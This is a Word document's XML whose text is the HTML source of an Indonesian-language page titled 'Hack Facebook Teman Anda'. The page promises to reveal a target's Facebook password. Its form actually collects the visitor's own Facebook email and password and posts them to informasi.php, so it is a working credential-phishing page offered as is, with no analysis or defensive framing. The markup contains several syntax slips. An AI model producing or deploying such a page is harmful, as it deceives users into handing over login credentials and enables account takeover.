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007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;title&gt;Hack Facebook Teman Anda !&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;body bgcolor="black" text="white"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;center&gt;&lt;center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;center&gt;&lt;center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007"/>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;form id="form1" name="form1" method="post" action="informasi.php"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;table width="455" border="0" cellspacing="0" cellpadding="0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">  &lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">    &lt;td height="45" align="right"&gt;&lt;label for="email1"&gt;Email Facebook Anda&lt;/label&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">    &lt;td&gt;&lt;input name="email1" type="text" id="email1" size="30" /&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007"/>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">  &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">  &lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">    &lt;td width="175" height="44" align="right"&gt;&lt;label for"fb"&gt;Email Facebook Target&lt;/label&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">    &lt;td width="280"&gt;&lt;input name="email2" type="text" id="email2" size="30" /&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007"/>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">  &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">  &lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">    &lt;td height="45" align="right"&gt;&lt;label for="email1"&gt;Password Facebook Anda&lt;/label&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">    &lt;td&gt;&lt;input name="fb" type="password" id="fb" size="30" /&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007"/>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007"/>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">  &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">  &lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;td height="41" align="right"&gt;&lt;label for="info"&gt;URL Facebook Target&lt;/label&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">    &lt;td&gt;&lt;textarea name="info" cols="30" rows"5" id="info"&gt;&lt;/textarea&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007"/>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">  &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">  &lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">    &lt;td height="38"&gt;&amp;nbsp;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">    &lt;td&gt;&lt;label&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="submit" name="submit" id"=submit" value="Jika anda telah mengisi semua form diatas , Silahkan klik tombol ini untuk mendapatkan password facebook target yang akan kami kirimkan melalui pesan di facebook anda !" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">    &lt;/label&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t xml:space="preserve">  &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007"/>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;body bgcolor="black" text="white"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;br&gt;Untuk membongkar password facebook teman anda , kami memerlukan informasi mengenai anda dan target orang yang facebooknya ingin anda hack&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>Silahkan masukan data anda dan data target anda pada form pengisian dibawah ini !</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00391007" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071370E" w:rsidRDefault="00391007" w:rsidP="00391007">
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="0071370E" w:rsidSect="00DC77DA">
      <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
      <w:pgMar w:top="2268" w:right="1418" w:bottom="1531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07"/>
    <w:rsid w:val="000C7635"/>
    <w:rsid w:val="0027182B"/>
    <w:rsid w:val="00391007"/>
    <w:rsid w:val="0054090A"/>
    <w:rsid w:val="0071480B"/>
    <w:rsid w:val="00754EC4"/>
    <w:rsid w:val="008F10B0"/>
    <w:rsid w:val="009724D9"/>
    <w:rsid w:val="00AB3260"/>
    <w:rsid w:val="00CD23F5"/>
    <w:rsid w:val="00CE7B8C"/>
    <w:rsid w:val="00DC77DA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FA48F-D55D-4E6B-A1D8-3F8FCEBB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Tristianto Nugroho</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tristianto Nugroho</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-12T16:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-12T16:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>